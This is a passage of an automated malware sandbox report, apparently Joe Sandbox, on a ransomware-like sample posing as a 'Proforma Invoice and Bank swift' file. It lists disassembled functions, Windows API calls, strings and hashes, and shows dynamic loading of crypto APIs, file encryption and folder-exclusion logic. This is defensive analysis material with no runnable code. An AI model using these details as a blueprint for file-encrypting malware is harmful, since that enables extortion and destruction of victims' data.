                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: NameUser_wcsicmp
                                                            • String ID:
                                                            • API String ID: 46677947-0
                                                            • Opcode ID: 3af6ba93c841a6dfec5909aa4c30899397575f505b83a40fa5704630c05f9164
                                                            • Instruction ID: 442cefb67fd77dc7d4c6c862235f07921af60ab383b0b3296d28c7faf1cdecfa
                                                            • Opcode Fuzzy Hash: 3af6ba93c841a6dfec5909aa4c30899397575f505b83a40fa5704630c05f9164
                                                            • Instruction Fuzzy Hash: 7DF0C875508341ABE710DB54C888BAFB3A4FFD4740F00882CF5AC432A5E6759544CB52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10005300 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 20sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 10001080: CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 100010D3
                                                              • Part of subcall function 10001080: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 100010EB
                                                              • Part of subcall function 10001080: TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 100010FC
                                                              • Part of subcall function 10001080: GetExitCodeProcess.KERNEL32(?,?), ref: 10001110
                                                              • Part of subcall function 10001080: FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 10001121
                                                              • Part of subcall function 10001080: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 10001128
                                                            • Sleep.KERNELBASE(00007530), ref: 10005326
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: Process$Close$ChangeCodeCreateExitFindHandleNotificationObjectSingleSleepTerminateWait
                                                            • String ID: taskdl.exe
                                                            • API String ID: 560332639-3879089904
                                                            • Opcode ID: 51d646c9bd2edbf85fdfc6af582cba98f12fd6c8ac893db1c951d156dd274f2d
                                                            • Instruction ID: d6b831c00407921d731d2983abcfaeab2a0bbf5aee0f41f70865c78235a7e0dd
                                                            • Opcode Fuzzy Hash: 51d646c9bd2edbf85fdfc6af582cba98f12fd6c8ac893db1c951d156dd274f2d
                                                            • Instruction Fuzzy Hash: 52D01271B2812197F340E7795C41B8732D4A7106D1F114623F554D31DCEAD1E9008575
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 100045C0 Relevance: 3.0, APIs: 2, Instructions: 15sleepthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 10004500: sprintf.MSVCRT ref: 10004528
                                                              • Part of subcall function 10004500: GetFileAttributesA.KERNELBASE(?), ref: 1000453C
                                                              • Part of subcall function 10004500: GetFileAttributesA.KERNEL32(00000000.pky), ref: 10004548
                                                            • Sleep.KERNELBASE(00001388), ref: 100045E3
                                                            • ExitThread.KERNEL32 ref: 100045E9
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile$ExitSleepThreadsprintf
                                                            • String ID:
                                                            • API String ID: 3028760467-0
                                                            • Opcode ID: 5e3f6d6ed5a0ad8cdc5edd1a5f4ca14f1afc00218b5e324edc674d1ee7b02308
                                                            • Instruction ID: 7f71a9df7b11f8961ba65e8475ca60af5bbcfddb40bc2544ede7146ac3c113f8
                                                            • Opcode Fuzzy Hash: 5e3f6d6ed5a0ad8cdc5edd1a5f4ca14f1afc00218b5e324edc674d1ee7b02308
                                                            • Instruction Fuzzy Hash: C1D0A7F5804F22D7F302A7A59C4174E36A8BF447C1F070116F5089315AEE60A6008F66
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10004150 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GlobalFree.KERNEL32(?), ref: 10004158
                                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 10004167
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: ChangeCloseFindFreeGlobalNotification
                                                            • String ID:
                                                            • API String ID: 397936838-0
                                                            • Opcode ID: 95c6753cd6a729dbd2e938d525553f3bf1bc6ee1f9d914f0cf534606ea1e53d3
                                                            • Instruction ID: 6e5334fcabd99f70dbee0bd7ab8d8fb6890c89af135d3bc21c4c58ce30c3f96f
                                                            • Opcode Fuzzy Hash: 95c6753cd6a729dbd2e938d525553f3bf1bc6ee1f9d914f0cf534606ea1e53d3
                                                            • Instruction Fuzzy Hash: CFC00270E0062597EF40DB748D88DDD77B9BB543F57124610F425E25D4DB38D8C58924
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10003FF3 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GlobalFree.KERNEL32(?), ref: 10003FFB
                                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 1000400A
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: ChangeCloseFindFreeGlobalNotification
                                                            • String ID:
                                                            • API String ID: 397936838-0
                                                            • Opcode ID: 95c6753cd6a729dbd2e938d525553f3bf1bc6ee1f9d914f0cf534606ea1e53d3
                                                            • Instruction ID: cde0e7c9d00266dd521057b441dd1465dd06113e1ffa8f738b3e980e73fa046c
                                                            • Opcode Fuzzy Hash: 95c6753cd6a729dbd2e938d525553f3bf1bc6ee1f9d914f0cf534606ea1e53d3
                                                            • Instruction Fuzzy Hash: 7BC00270D0011597EF50DB748C88ADD77B9BB043E17114610F565F25E4DB39D8D58924
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10003760 Relevance: 1.3, APIs: 1, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: ??2@
                                                            • String ID:
                                                            • API String ID: 1033339047-0
                                                            • Opcode ID: 74eacbc20383896c45a81761181eb09298f2ecdfe049397aa81faf53124bbe71
                                                            • Instruction ID: a15c0a293f5e24c1dea9984ccd3df6ccb11cefa01a4d594410c7fe3b55cc443a
                                                            • Opcode Fuzzy Hash: 74eacbc20383896c45a81761181eb09298f2ecdfe049397aa81faf53124bbe71
                                                            • Instruction Fuzzy Hash: E1F08CF66042018F9B09CF18C05096AB7EAEFC87A0B16806DE80EDB391DB70AC01CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 10004440 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 62libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(advapi32.dll,7598A710,10003416,7598A710,10005BA1), ref: 10004456
                                                            • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 10004473
                                                            • GetProcAddress.KERNEL32(00000000,CryptImportKey), ref: 10004480
                                                            • GetProcAddress.KERNEL32(00000000,CryptDestroyKey), ref: 1000448D
                                                            • GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 1000449A
                                                            • GetProcAddress.KERNEL32(00000000,CryptDecrypt), ref: 100044A7
                                                            • GetProcAddress.KERNEL32(00000000,CryptGenKey), ref: 100044B4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad
                                                            • String ID: CryptAcquireContextA$CryptDecrypt$CryptDestroyKey$CryptEncrypt$CryptGenKey$CryptImportKey$advapi32.dll
                                                            • API String ID: 2238633743-2459060434
                                                            • Opcode ID: b363998bde18683af009ee46e1ce10118f5fbe9ee4d3bceef1b0164aeb75d0ff
                                                            • Instruction ID: 8acda46cc026f7592c4ee70142fb235f08bec8b36f89472f51a8b593d463a20b
                                                            • Opcode Fuzzy Hash: b363998bde18683af009ee46e1ce10118f5fbe9ee4d3bceef1b0164aeb75d0ff
                                                            • Instruction Fuzzy Hash: 781121B0643761A7FB54FB6A9C94FEE3694EBC42D1302002BE9019315DDF649841CB70
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10006940 Relevance: 12.2, APIs: 8, Instructions: 209COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ??0exception@@QAE@ABQBD@Z.MSVCRT(1000D8CC), ref: 10006959
                                                            • _CxxThrowException.MSVCRT(?,1000AF00), ref: 10006969
                                                            • ??0exception@@QAE@ABQBD@Z.MSVCRT(1000D8CC), ref: 10006A54
                                                            • _CxxThrowException.MSVCRT(?,1000AF00), ref: 10006A64
                                                            • ??0exception@@QAE@ABQBD@Z.MSVCRT(1000D8CC), ref: 10006B1F
                                                            • _CxxThrowException.MSVCRT(?,1000AF00), ref: 10006B2F
                                                            • ??0exception@@QAE@ABQBD@Z.MSVCRT(1000D8D0), ref: 10006B85
                                                            • _CxxThrowException.MSVCRT(?,1000AF00), ref: 10006B95
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: ??0exception@@ExceptionThrow
                                                            • String ID:
                                                            • API String ID: 941485209-0
                                                            • Opcode ID: 2f6f863f4f1b27604bc7f9c16208b3bc369cdb7356135f5c50d3af07c9db71d3
                                                            • Instruction ID: 059c23d85c393ba9fd365f6bea795e9a80031673541d73dce98a36ed974061eb
                                                            • Opcode Fuzzy Hash: 2f6f863f4f1b27604bc7f9c16208b3bc369cdb7356135f5c50d3af07c9db71d3
                                                            • Instruction Fuzzy Hash: FD6182357042528BE704DF299C909ABB7E7FBCD284F15867DEC89A7209CB31AA05CB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10003D10 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 154encryptionstringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 10003A80: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,75AA3310,75AA3310,10003D9E,?,75AA3310,00000000), ref: 10003A9D
                                                              • Part of subcall function 10003F00: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10003F45
                                                              • Part of subcall function 10003F00: GetFileSize.KERNEL32(00000000,00000000), ref: 10003F5B
                                                              • Part of subcall function 10003F00: _local_unwind2.MSVCRT ref: 10004017
                                                            • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000200,?,?,?,?,75AA3310,00000000), ref: 10003E2B
                                                            • _local_unwind2.MSVCRT ref: 10003E3B
                                                            • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,?,?,?,?,75AA3310,00000000), ref: 10003E70
                                                            • strncmp.MSVCRT(00000000,75AA3310,?,?,?,?,?,75AA3310,00000000), ref: 10003EA1
                                                            • _local_unwind2.MSVCRT ref: 10003EB4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: Crypt_local_unwind2$File$AcquireContextCreateDecryptEncryptSizestrncmp
                                                            • String ID: TESTDATA
                                                            • API String ID: 154225373-1607903762
                                                            • Opcode ID: 5841e8cc0e4b8ef1c8e0f906ed67527bce7dcc068ddb21026a2c4ed6748e33c7
                                                            • Instruction ID: a032fc21090523e0544b4f1491e0cf73a7f188879e4d6ad20d27030e122f8292
                                                            • Opcode Fuzzy Hash: 5841e8cc0e4b8ef1c8e0f906ed67527bce7dcc068ddb21026a2c4ed6748e33c7
                                                            • Instruction Fuzzy Hash: E5513E75900258ABE714CB64DC85BEBB7B8FB48360F1087ADF919D72C5EB709A44CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10005DC0 Relevance: 9.4, APIs: 6, Instructions: 375COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ??0exception@@QAE@ABQBD@Z.MSVCRT ref: 10005DDF
                                                            • _CxxThrowException.MSVCRT(?,1000AF00), ref: 10005DEF
                                                            • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 10005E18
                                                            • _CxxThrowException.MSVCRT(?,1000AF00), ref: 10005E28
                                                            • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 10005E51
                                                            • _CxxThrowException.MSVCRT(?,1000AF00), ref: 10005E61
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: ??0exception@@ExceptionThrow
                                                            • String ID:
                                                            • API String ID: 941485209-0
                                                            • Opcode ID: 88114097bd0232d87ad232c99e4ff1f677db4ca52730fc6aa934377dfeb33ee7
                                                            • Instruction ID: 5cf11e140e7aea64f1cdd1e13d3de007c6777824907ae8690337d7dedc6976b5
                                                            • Opcode Fuzzy Hash: 88114097bd0232d87ad232c99e4ff1f677db4ca52730fc6aa934377dfeb33ee7
                                                            • Instruction Fuzzy Hash: 82E1B5716042458BE708CF29C89069AB7E2FFCD384F59857DE889DB35ADB30EA41CB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10001360 Relevance: 4.5, APIs: 3, Instructions: 45memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,7598F130), ref: 1000139C
                                                            • CheckTokenMembership.ADVAPI32(00000000,?,7598F130,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000), ref: 100013B6
                                                            • FreeSid.ADVAPI32(?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 100013C9
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                            • String ID:
                                                            • API String ID: 3429775523-0
                                                            • Opcode ID: e2dc8b4d3794bc66afb40d1778fc3f1714f7f223d93bfd3796b057e1ee31e261
                                                            • Instruction ID: d0e0d5e2c48fa59e13d9dd79d39f3d735634ff5945503f036d462e8db185075f
                                                            • Opcode Fuzzy Hash: e2dc8b4d3794bc66afb40d1778fc3f1714f7f223d93bfd3796b057e1ee31e261
                                                            • Instruction Fuzzy Hash: 95014F7154C381FFE340DB2888C4AABBBE8EB94684FC49C4DF48943156D234D908D727
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10006280 Relevance: 3.3, APIs: 2, Instructions: 308COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ??0exception@@QAE@ABQBD@Z.MSVCRT(1000D8CC), ref: 1000629A
                                                            • _CxxThrowException.MSVCRT(?,1000AF00), ref: 100062AA
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: ??0exception@@ExceptionThrow
                                                            • String ID:
                                                            • API String ID: 941485209-0
                                                            • Opcode ID: f99b3965f5dc8d8fa443a323bef4497a13ce9e85b048de717e3a56c0278bf916
                                                            • Instruction ID: 8a3fb1430c27dfc228261433490dab6bd00980f295ff4bb0f266184577da6e41
                                                            • Opcode Fuzzy Hash: f99b3965f5dc8d8fa443a323bef4497a13ce9e85b048de717e3a56c0278bf916
                                                            • Instruction Fuzzy Hash: B7C17022A083D24BD305CF7988E009AFFE2BFDE244B4ED4BDE5C99B366C57195098791
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10006640 Relevance: 3.2, APIs: 2, Instructions: 242COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ??0exception@@QAE@ABQBD@Z.MSVCRT(1000D8CC), ref: 10006659
                                                            • _CxxThrowException.MSVCRT(?,1000AF00), ref: 10006669
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: ??0exception@@ExceptionThrow
                                                            • String ID:
                                                            • API String ID: 941485209-0
                                                            • Opcode ID: 3d7b9d66e8179924543ffb11a62235faef9196394649210147293824cf356565
                                                            • Instruction ID: 79948d9e1e0e4fd9a86f40f9287b0f552434bc35f44e017899462d58d151028f
                                                            • Opcode Fuzzy Hash: 3d7b9d66e8179924543ffb11a62235faef9196394649210147293824cf356565
                                                            • Instruction Fuzzy Hash: FF91BE756083828FD718CF28C890A9ABBE2FFCE344F25496DE989C7315C631E945CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10004420 Relevance: 1.5, APIs: 1, Instructions: 8encryptionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CryptGenRandom.ADVAPI32(?,?,?,10005C8E,1000DC68,00000008), ref: 1000442E
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: CryptRandom
                                                            • String ID:
                                                            • API String ID: 2662593985-0
                                                            • Opcode ID: d06b0dacaee5c54850b691ccf3e24bdfd13cabadfb239f9e5f564d51c7bd1099
                                                            • Instruction ID: 910617a22df543c658d5e937306ede2f8c1cb301d3e6414bbcf59057d7a0af43
                                                            • Opcode Fuzzy Hash: d06b0dacaee5c54850b691ccf3e24bdfd13cabadfb239f9e5f564d51c7bd1099
                                                            • Instruction Fuzzy Hash: 8CC04C76904100FFD640DB54C988C1BB7E8BBD8740B10C508F148C3219C235DC02CB71
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 100032C0 Relevance: 38.6, APIs: 12, Strings: 10, Instructions: 133COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: _wcsicmp$_wcsnicmpwcsstr
                                                            • String ID: This folder protects against ransomware. Modifying it will reduce protection$Content.IE5$Temporary Internet Files$\AppData\Local\Temp$\Intel$\Local Settings\Temp$\Program Files$\Program Files (x86)$\ProgramData$\WINDOWS
                                                            • API String ID: 2817753184-2255769345
                                                            • Opcode ID: 6cfffdfc71b6d1416cfc2fc1491a62cd526dfb3bccc185a7816e0e1a3bc15258
                                                            • Instruction ID: 38e0f07987acc90c5f2470768db190762cea25da07dd160877f69bc08099ee56
                                                            • Opcode Fuzzy Hash: 6cfffdfc71b6d1416cfc2fc1491a62cd526dfb3bccc185a7816e0e1a3bc15258
                                                            • Instruction Fuzzy Hash: E7318F3375166522F211E21DAC81FCB138CDFA52E7F028033FE44E5144E74AAAAA86B1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10003410 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 72libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,7598A710,10005BA1), ref: 10003433
                                                            • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 10003450
                                                            • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 1000345D
                                                            • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 1000346A
                                                            • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 10003477
                                                            • GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 10003484
                                                            • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 10003491
                                                            • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 1000349E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
